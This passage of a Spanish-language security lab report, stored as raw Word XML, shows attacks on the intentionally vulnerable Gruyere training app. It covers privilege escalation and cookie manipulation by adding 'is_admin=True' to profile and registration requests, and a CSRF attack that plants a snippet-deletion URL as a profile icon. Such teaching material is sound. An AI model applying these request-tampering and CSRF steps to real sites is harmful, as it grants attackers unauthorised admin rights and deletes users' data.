    <w:p w14:paraId="6D3DF9B9" w14:textId="7DA21887" w:rsidR="00DF2697" w:rsidRDefault="00DF2697" w:rsidP="00DF2697">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="703CDF1A" w14:textId="57F7D28C" w:rsidR="00DF2697" w:rsidRDefault="00DF2697" w:rsidP="00DF2697">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>No debemos confiar en ningún dato del usuario, el navegador en la máquina del usuario en realidad envía los datos al servidor web de la aplicación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595527D7" w14:textId="1AB08A3C" w:rsidR="00DF2697" w:rsidRDefault="00DF2697">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc128034164"/>
      <w:r>
        <w:t>Elevación de privilegios -&gt;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="01B3DF91" w14:textId="047489B7" w:rsidR="00DF2697" w:rsidRDefault="00DF2697" w:rsidP="00DF2697">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>La escalada o elevación de privilegios se puede definir como un ataque que implica obtener acceso ilícito a derechos o privilegios elevados, más allá de los derechos de un usuario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D3F478" w14:textId="6F0EDDDB" w:rsidR="00DF2697" w:rsidRDefault="00DF2697" w:rsidP="00DF2697">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Para probar este ataque vamos a elevar nuestra cuenta a administrador, en este caso la cuenta será usuario y su contraseña usuario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28620B2D" w14:textId="3105FE34" w:rsidR="00DF2697" w:rsidRDefault="00DF2697" w:rsidP="00DF2697">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vamos a ver el código de editprogile.gtl, que </w:t>
      </w:r>
      <w:r w:rsidR="00C57F5D">
        <w:t>muestra</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> el proceso de </w:t>
      </w:r>
      <w:r w:rsidR="00C57F5D">
        <w:t>cómo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> se guarda el perfil:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A949F0F" w14:textId="4C68150E" w:rsidR="00DF2697" w:rsidRDefault="00DF2697" w:rsidP="00DF2697">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="00DF2697">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C1B1C3A" wp14:editId="65059FC0">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFCA05D" w14:textId="29A0E74E" w:rsidR="00C524D2" w:rsidRDefault="00C524D2" w:rsidP="00DF2697">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CD654CF" w14:textId="29392B73" w:rsidR="00C524D2" w:rsidRDefault="00C524D2" w:rsidP="00DF2697">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Vemos que en la cookie se valida si es admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11449A05" w14:textId="0248BCDD" w:rsidR="00C524D2" w:rsidRDefault="00C524D2" w:rsidP="00DF2697">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para esto vamos ejecutar esto en nuestra URL: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6704CEBF" w14:textId="6EC482B7" w:rsidR="00DF2697" w:rsidRPr="00290DA9" w:rsidRDefault="00C524D2" w:rsidP="00C524D2">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="708"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00290DA9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/saveprofile?action=update&amp;is_admin=True</w:t>
      </w:r>
      <w:r w:rsidR="00DF2697" w:rsidRPr="00290DA9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00DF2697" w:rsidRPr="00290DA9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAF34E2" w14:textId="223E7017" w:rsidR="00C524D2" w:rsidRDefault="00C524D2" w:rsidP="00C524D2">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Luego tendremos que cerrar sesión e iniciar sesión para actualizar nuestra cookie de sesión. Entonces veremos en enlace Administrar nuestro servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505EE484" w14:textId="637184B3" w:rsidR="00C524D2" w:rsidRDefault="00C524D2" w:rsidP="00C524D2">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14FCC4AF" w14:textId="17739AE4" w:rsidR="00C524D2" w:rsidRDefault="00C524D2" w:rsidP="00C524D2">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="00C524D2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A2419A8" wp14:editId="4B65B23D">
            <wp:extent cx="5400040" cy="290258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2902585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4909D04E" w14:textId="34E6C061" w:rsidR="00C524D2" w:rsidRDefault="00C524D2" w:rsidP="00C524D2">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="136F1538" w14:textId="2B2BE4E2" w:rsidR="00C524D2" w:rsidRDefault="00C524D2" w:rsidP="00C524D2">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="00C524D2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77BFBFBD" wp14:editId="7456DABB">
            <wp:extent cx="5400040" cy="290258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902585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF884E6" w14:textId="520F3A61" w:rsidR="00980C2A" w:rsidRDefault="00980C2A" w:rsidP="00C524D2">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D3F7860" w14:textId="1365AF7B" w:rsidR="00980C2A" w:rsidRDefault="00980C2A" w:rsidP="00C524D2">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Como podemos comprobar en nuestra cookie pone que somos administrador:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E9ED89" w14:textId="59980208" w:rsidR="00980C2A" w:rsidRDefault="00980C2A" w:rsidP="00C524D2">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="00980C2A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3792D5A8" wp14:editId="4C22C316">
            <wp:extent cx="5400040" cy="272542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2725420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFDDF8A" w14:textId="41BCD928" w:rsidR="00C524D2" w:rsidRDefault="00C524D2" w:rsidP="00C524D2">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04E39818" w14:textId="3BF04BDF" w:rsidR="00C524D2" w:rsidRDefault="00C524D2" w:rsidP="00C524D2">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Esto ocurre porque tenemos un formulario oculto, que permite actualizar el perfil del usuario, y con eso ser administrador.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5C80BC" w14:textId="77777777" w:rsidR="00CB125D" w:rsidRDefault="00CB125D" w:rsidP="00C524D2">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="576DA11D" w14:textId="23CAC2DC" w:rsidR="00CB125D" w:rsidRDefault="00CB125D" w:rsidP="00C524D2">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34A225EC" w14:textId="77777777" w:rsidR="00CB125D" w:rsidRDefault="00CB125D" w:rsidP="00C524D2">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D18C353" w14:textId="4A0A1E12" w:rsidR="00CA0069" w:rsidRDefault="00CA0069" w:rsidP="00C524D2">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="013066FE" w14:textId="03F3DDB5" w:rsidR="00CA0069" w:rsidRDefault="00CA0069">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc128034165"/>
      <w:r>
        <w:t>Manipulación de cookies -&gt;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w14:paraId="3D8D1CD4" w14:textId="6997D412" w:rsidR="00CA0069" w:rsidRDefault="00CA0069" w:rsidP="00CA0069">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00AF9554" w14:textId="7491CD6F" w:rsidR="00CA0069" w:rsidRDefault="00CA0069" w:rsidP="00CA0069">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Un protocolo sin estado es un protocolo de comunicación en el que el receptor no debe conservar el estado de sesión de solicitudes anteriores. El remitente transfiere el estado de la sesión relevante a un receptor de tal manera de que en cada solicitud se pueda entender de forma aislada, es decir, sin referencia al estado de sesión de solicitudes anteriores retenidas por el receptor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18831AA1" w14:textId="2CFCB604" w:rsidR="00135FCB" w:rsidRDefault="00135FCB" w:rsidP="00CA0069">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>El servidor web no puede saber automáticamente que dos solicitudes son del mismo cliente. Por eso se inventaron las cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DF8766" w14:textId="7103E7F4" w:rsidR="00135FCB" w:rsidRDefault="00135FCB" w:rsidP="00CA0069">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>En este caso la página web, recuerda la identidad del usuario en las cookies de esta forma: [hash|Nombre del usuario|administrador|autor]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE673C0" w14:textId="5F2BD932" w:rsidR="00135FCB" w:rsidRDefault="00135FCB" w:rsidP="00CA0069">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vamos a ver la cookie del usuario </w:t>
      </w:r>
      <w:r w:rsidR="0050646B">
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:t>usuario</w:t>
      </w:r>
      <w:r w:rsidR="0050646B">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0355C618" w14:textId="0C9D3C39" w:rsidR="00135FCB" w:rsidRDefault="00135FCB" w:rsidP="00CA0069">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="071BFE59" w14:textId="2545E310" w:rsidR="00135FCB" w:rsidRDefault="0050646B" w:rsidP="00CA0069">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="0050646B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20991CDC" wp14:editId="50C41FD6">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0"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5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0524990F" w14:textId="6810896C" w:rsidR="009052C9" w:rsidRDefault="009052C9" w:rsidP="00CA0069">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D74DE2E" w14:textId="56689B63" w:rsidR="009052C9" w:rsidRDefault="009052C9" w:rsidP="00CA0069">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora crearé una nueva cuenta con el nombre de usuario ‘a’ y contraseña ‘a’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061DF67E" w14:textId="4685E4DD" w:rsidR="009052C9" w:rsidRDefault="009052C9" w:rsidP="00CA0069">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19A9C8C1" w14:textId="18755384" w:rsidR="009052C9" w:rsidRDefault="009052C9" w:rsidP="00CA0069">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="009052C9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F03BEAF" wp14:editId="31C97409">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6811A50D" w14:textId="6BD19E7D" w:rsidR="009052C9" w:rsidRDefault="009052C9" w:rsidP="00CA0069">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63BA226F" w14:textId="149E3D46" w:rsidR="009052C9" w:rsidRDefault="009052C9" w:rsidP="00CA0069">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Y ahora hacemos login</w:t>
      </w:r>
      <w:r w:rsidR="009B0776">
        <w:t>, y veremos la cookie es este usuario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A16419" w14:textId="6B89D95D" w:rsidR="009B0776" w:rsidRDefault="009B0776" w:rsidP="00CA0069">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2264AD2A" w14:textId="7D841D28" w:rsidR="009B0776" w:rsidRDefault="009B0776" w:rsidP="00CA0069">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="009B0776">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="623F7A20" wp14:editId="615463C3">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="505F8842" w14:textId="587306FC" w:rsidR="009B0776" w:rsidRDefault="009B0776" w:rsidP="00CA0069">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FDFE4C9" w14:textId="1C637BB7" w:rsidR="009B0776" w:rsidRDefault="009B0776" w:rsidP="00CA0069">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Si comprobamos en el login, veremos donde se guarda la cookie del usuario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D92336" w14:textId="7028B784" w:rsidR="009B0776" w:rsidRDefault="009B0776" w:rsidP="00CA0069">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6515282E" w14:textId="41D32C3F" w:rsidR="009B0776" w:rsidRDefault="009B0776" w:rsidP="00CA0069">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="009B0776">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D553CAF" wp14:editId="4E77271A">
            <wp:extent cx="5400040" cy="290258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40" cy="2902585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D16F5C" w14:textId="74AA10B5" w:rsidR="009B0776" w:rsidRDefault="009B0776" w:rsidP="00CA0069">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B4FEC5C" w14:textId="77777777" w:rsidR="009B0776" w:rsidRDefault="009B0776" w:rsidP="00CA0069">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30D85B2E" w14:textId="772EB2B9" w:rsidR="009052C9" w:rsidRDefault="009052C9" w:rsidP="00CA0069">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="558B5A31" w14:textId="29FC29B9" w:rsidR="009052C9" w:rsidRDefault="009052C9" w:rsidP="00CA0069">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="009052C9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="701E6209" wp14:editId="0AAB40A8">
            <wp:extent cx="5399804" cy="4209393"/>
            <wp:effectExtent l="0" t="0" r="0" b="127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8044" cy="4215817"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D95953" w14:textId="3244AB0E" w:rsidR="0031064F" w:rsidRDefault="0031064F" w:rsidP="00CA0069">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6957BD36" w14:textId="01EB18AE" w:rsidR="0031064F" w:rsidRDefault="0031064F" w:rsidP="00CA0069">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Cuando nos registramos podemos cambiar el valor de la petición añadiendo is_admin=True, esto lo hare creando un nuevo usuario llamado ‘b’ y con contraseña ‘b’:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331E71CD" w14:textId="32008DDB" w:rsidR="0031064F" w:rsidRDefault="0031064F" w:rsidP="00CA0069">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A4EE6DE" w14:textId="73F0233D" w:rsidR="0031064F" w:rsidRDefault="0031064F" w:rsidP="00CA0069">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="0031064F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DFA43E0" wp14:editId="19D0A254">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E84DA3D" w14:textId="2DC13217" w:rsidR="0031064F" w:rsidRDefault="0031064F" w:rsidP="00CA0069">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67AB6A81" w14:textId="32657F25" w:rsidR="0031064F" w:rsidRDefault="0031064F" w:rsidP="00CA0069">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Aquí tenemos la cookie:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACB856E" w14:textId="32780716" w:rsidR="0031064F" w:rsidRDefault="00A91351" w:rsidP="00CA0069">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="00A91351">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41B49CFA" wp14:editId="189F6ED0">
            <wp:extent cx="5400040" cy="290258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2902585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CFD462" w14:textId="275ED604" w:rsidR="00A91351" w:rsidRDefault="00A91351" w:rsidP="00CA0069">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43498E8E" w14:textId="7C4529B9" w:rsidR="00A91351" w:rsidRDefault="00A91351" w:rsidP="00CA0069">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29036499" w14:textId="77777777" w:rsidR="003A411B" w:rsidRDefault="003A411B" w:rsidP="003A411B">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34449455" w14:textId="34049CBC" w:rsidR="00A91351" w:rsidRDefault="00FE7B0C">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc128034166"/>
      <w:r>
        <w:t>Falsificación de solicitudes e</w:t>
      </w:r>
      <w:r w:rsidR="0041457D">
        <w:t>ntre</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sitios (XSRF/CSFR)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w14:paraId="2FFD9750" w14:textId="484CC4CE" w:rsidR="00597BAB" w:rsidRDefault="00597BAB" w:rsidP="00597BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4426F8D0" w14:textId="28CA0325" w:rsidR="00597BAB" w:rsidRPr="00597BAB" w:rsidRDefault="00597BAB" w:rsidP="00597BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>La falsificación de solicitudes entre sitios también conocida como XSFR/CSFR es una vulnerabilidad de la seguridad web que permite a un atacante inducir a los usuarios a realizar acciones que no tienen intención de hacer. Permitir que un atacante eluda parcialmente la misma política de origen, que esta modificada para que diferentes sitios web interfieran entre sí.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603DB1CC" w14:textId="554698DC" w:rsidR="00FE7B0C" w:rsidRDefault="00597BAB" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Para probar este caso primero vamos a ver la URL que es elimina los fragmentos, para esto eliminamos el nuestro y lo vemos, para esto voy usar el usuario ‘usuario’ con contraseña ‘usuario’:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10630831" w14:textId="3A21DC13" w:rsidR="00597BAB" w:rsidRDefault="00597BAB" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00597BAB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DAD9D6E" wp14:editId="29C9B497">
            <wp:extent cx="5400040" cy="290258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902585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="400488DD" w14:textId="3742B212" w:rsidR="00597BAB" w:rsidRDefault="00597BAB" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14B6223A" w14:textId="3329423C" w:rsidR="00597BAB" w:rsidRDefault="00597BAB" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Encontramos esta solicitud:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DED395" w14:textId="32DA9105" w:rsidR="00597BAB" w:rsidRDefault="00597BAB" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00597BAB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="020409DB" wp14:editId="4E7C926F">
            <wp:extent cx="5400040" cy="4682359"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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1928" cy="4683996"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FA2D7C" w14:textId="589EAE01" w:rsidR="00597BAB" w:rsidRDefault="00597BAB" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Encontramos esta solicitud GET:/deletesnippet?index=0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B17200" w14:textId="314FA86B" w:rsidR="00597BAB" w:rsidRDefault="00597BAB" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ahora pondremos la URL completa en nuestro icono de gruyere, usando la función editar perfil:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FCDCB3" w14:textId="00697C70" w:rsidR="00597BAB" w:rsidRDefault="00000000" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:hyperlink r:id="rId226" w:history="1">
        <w:r w:rsidR="00DF529E" w:rsidRPr="0047476A">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>http://192.168.1.99:8080/583680485808208639031964731065993512240/deletesnippet?index=0</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="42BCA2A4" w14:textId="36561C06" w:rsidR="00DF529E" w:rsidRDefault="00DF529E" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00DF529E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34E2AED6" wp14:editId="69B3EB48">
